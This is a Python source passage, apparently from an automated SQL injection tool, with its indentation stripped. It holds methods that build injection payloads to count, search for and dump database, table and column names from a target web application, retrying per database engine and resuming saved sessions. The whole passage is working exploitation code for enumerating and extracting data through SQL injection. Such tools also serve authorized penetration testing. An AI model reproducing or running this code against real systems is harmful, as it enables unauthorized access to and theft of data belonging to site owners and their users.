def _col_count(self, db="", tbl=""):
_temp = []
if db and tbl:
count_payloads = []
[count_payloads.extend(v) for _, v in PAYLOADS_COLS_COUNT.items()]
encode_db = to_hex(db, dbms=self._dbms)
encode_tbl = to_hex(tbl, dbms=self._dbms)
if self._dbms:
count_payloads = PAYLOADS_COLS_COUNT.get(
self._dbms, count_payloads)
for entry in count_payloads:
data = entry.format(db=encode_db, tbl=encode_tbl)
_temp.append(data)
payloads = self._generat_payload(payloads_list=_temp)
return self._extact(payloads=payloads)
def _tbl_count(self, db=""):
_temp = []
if db:
count_payloads = []
[count_payloads.extend(v) for _, v in PAYLOADS_TBLS_COUNT.items()]
encode_string = to_hex(db, dbms=self._dbms)
if self._dbms:
count_payloads = PAYLOADS_TBLS_COUNT.get(
self._dbms, count_payloads)
for entry in count_payloads:
if self._dbms and self._dbms.startswith(
"Microsoft") and "sysobjects" in entry:
data = entry.format(db=db.strip())
else:
data = entry.format(db=encode_string)
_temp.append(data)
payloads = self._generat_payload(payloads_list=_temp)
return self._extact(payloads=payloads)
def _search_payloads(self, db="", tbl="", col="", search_type=""):
Payloads = collections.namedtuple(
"Payloads", ["for_count", "for_dump", "table_to_generate"])
count_payloads, dump_payloads = [], []
QUERY_COUNT = ""
QUERY_DUMP = ""
table_to_generate = ""
if search_type == "database":
table_to_generate = f"{db}_{search_type}"
logger.info(f"searching databases LIKE '{db}'")
count_payloads = PAYLOAD_SCHEMA_SEARCH_COUNT
dump_payloads = PAYLOAD_SCHEMA_SEARCH_DUMP
db = to_hex(f"%{db}%")
QUERY_COUNT = f"(SCHEMA_NAME LIKE {db})"
if search_type == "table":
table_to_generate = f"{tbl}_{search_type}"
count_payloads = PAYLOADS_TABLE_SEARCH_COUNT
dump_payloads = PAYLOADS_TABLE_SEARCH_DUMP
if db and tbl:
logger.info(
f"searching tables LIKE '{tbl}' for database '{db}'")
db = to_hex(db)
tbl = to_hex(f"%{tbl}%")
QUERY_COUNT = f"(TABLE_SCHEMA={db})AND(TABLE_NAME LIKE {tbl})"
else:
logger.info(f"searching tables LIKE '{tbl}'")
tbl = to_hex(f"%{tbl}%")
QUERY_COUNT = f"(TABLE_NAME LIKE {tbl})"
if search_type == "column":
table_to_generate = f"{col}_{search_type}"
count_payloads = PAYLOADS_COLUMN_SEARCH_COUNT
dump_payloads = PAYLOADS_COLUMN_SEARCH_DUMP
if db and tbl and col:
logger.info(
f"searching columns LIKE '{col}' for table '{tbl}' in database '{db}'"
)
db = to_hex(db)
tbl = to_hex(tbl)
col = to_hex(f"%{col}%")
QUERY_COUNT = f"(TABLE_SCHEMA={db})AND(TABLE_NAME={tbl})AND(COLUMN_NAME LIKE {col})"
elif not db and tbl and col:
logger.info(
f"searching columns LIKE '{col}' for table '{tbl}' across all databases"
)
tbl = to_hex(tbl)
col = to_hex(f"%{col}%")
QUERY_COUNT = f"(TABLE_NAME={tbl})AND(COLUMN_NAME LIKE {col})"
elif not tbl and db and col:
logger.info(
f"searching columns LIKE '{col}' in database '{db}'")
db = to_hex(db)
col = to_hex(f"%{col}%")
QUERY_COUNT = f"(TABLE_SCHEMA={db})AND(COLUMN_NAME LIKE {col})"
else:
logger.info(
f"searching columns LIKE '{col}' across all databases")
col = to_hex(f"%{col}%")
QUERY_COUNT = f"(COLUMN_NAME LIKE {col})"
queries_count, queries_dump = [], []
QUERY_DUMP += "%sLIMIT {OFFSET},1" % (QUERY_COUNT)
for query in count_payloads:
prepared_query = query.format(QUERY=QUERY_COUNT)
queries_count.append(prepared_query)
for query in dump_payloads:
prepared_query = query.format(QUERY=QUERY_DUMP.format(OFFSET=0))
queries_dump.append(prepared_query)
for_count = self._generat_payload(payloads_list=queries_count)
for_dump = self._generat_payload(payloads_list=queries_dump)
return Payloads(for_count=for_count,
for_dump=for_dump,
table_to_generate=table_to_generate)
def tbl_names(self, db=""):
index = 0
_temp = []
is_resumed = False
fetched_data = {}
_temp_payloads = []
TablesResponse = collections.namedtuple(
"TablesResponse", ["fetched", "count", "database", "tables"])
if db:
dump_payloads = []
[dump_payloads.extend(v) for _, v in PAYLOADS_TBLS_NAMES.items()]
encode_string = to_hex(db, dbms=self._dbms)
if self._dbms:
dump_payloads = PAYLOADS_TBLS_NAMES.get(
self._dbms, dump_payloads)
for entry in dump_payloads:
if self._dbms and self._dbms.startswith("Microsoft"):
if "sysobjects" in entry:
data = entry.format(db=db.strip(), db1=db.strip())
else:
data = entry.format(db=encode_string,
db1=encode_string)
else:
data = entry.format(db=encode_string)
_temp_payloads.append(data)
try:
fetched_data = session.fetch_from_table(
session_filepath=self.session_filepath,
table_name=db,
cursor=False,
)
if fetched_data:
is_resumed = True
except Exception as error:
pass
logger.info("fetching tables for database: '%s'" % (db))
retval = self._tbl_count(db=db)
if retval.is_injected:
tbl_count = int(retval.result)
if tbl_count != 0:
logger.info("used SQL query returns %d entries" % (tbl_count))
if tbl_count == 0:
logger.warning(
"used SQL query returns %d entries for database: '%s'" %
(tbl_count, db))
return TablesResponse(fetched=False,
count=tbl_count,
database=db,
tables=[])
if is_resumed:
for entry in fetched_data:
name = entry.get("tblname")
if name not in _temp:
_temp.append(name)
logger.info(f"resumed: '{name}'")
index += 1
should_fetch = True
if is_resumed:
if len(fetched_data) == tbl_count:
should_fetch = False
if should_fetch:
payloads = self._generat_payload(payloads_list=_temp_payloads)
retval = self._extact(payloads=payloads)
if retval.is_injected:
payload = retval.payload
payloads = self._generate_tbl_payloads(tbl_count=tbl_count,
payload=payload,
index=index)
if not is_resumed:
session.generate_table(
session_filepath=self.session_filepath,
query=DB_TABLES.format(name=db, tbl_name=db),
)
response_data = self._extract_tbls(payloads=payloads,
database=db)
if response_data.is_fetched:
_temp.extend(response_data.result)
self._pprint_tables(
cursor_or_list=_temp,
field_names="Tables",
database=db,
)
return TablesResponse(fetched=True,
count=tbl_count,
database=db,
tables=_temp)
if not retval.is_injected:
status_code = retval.status_code
error = retval.error
count = retval.payloads_count
if status_code not in [200, 0]:
message = f"{error} - {count} times"
logger.warning(
f"HTTP error codes detected during run:\n{message}"
)
else:
message = f"tested with '{count}' queries, unable to find working SQL query."
logger.critical(message)
else:
self._pprint_tables(
cursor_or_list=_temp,
field_names="Tables",
database=db,
)
return TablesResponse(fetched=True,
count=tbl_count,
database=db,
tables=_temp)
if not retval.is_injected:
status_code = retval.status_code
error = retval.error
count = retval.payloads_count
if status_code not in [200, 0]:
message = f"{error} - {count} times"
logger.warning(
f"HTTP error codes detected during run:\n{message}")
else:
message = (
f"tested with '{count}' queries, unable to find working SQL query."
)
logger.critical(message)
return TablesResponse(fetched=False,
count=0,
database="",
tables=_temp)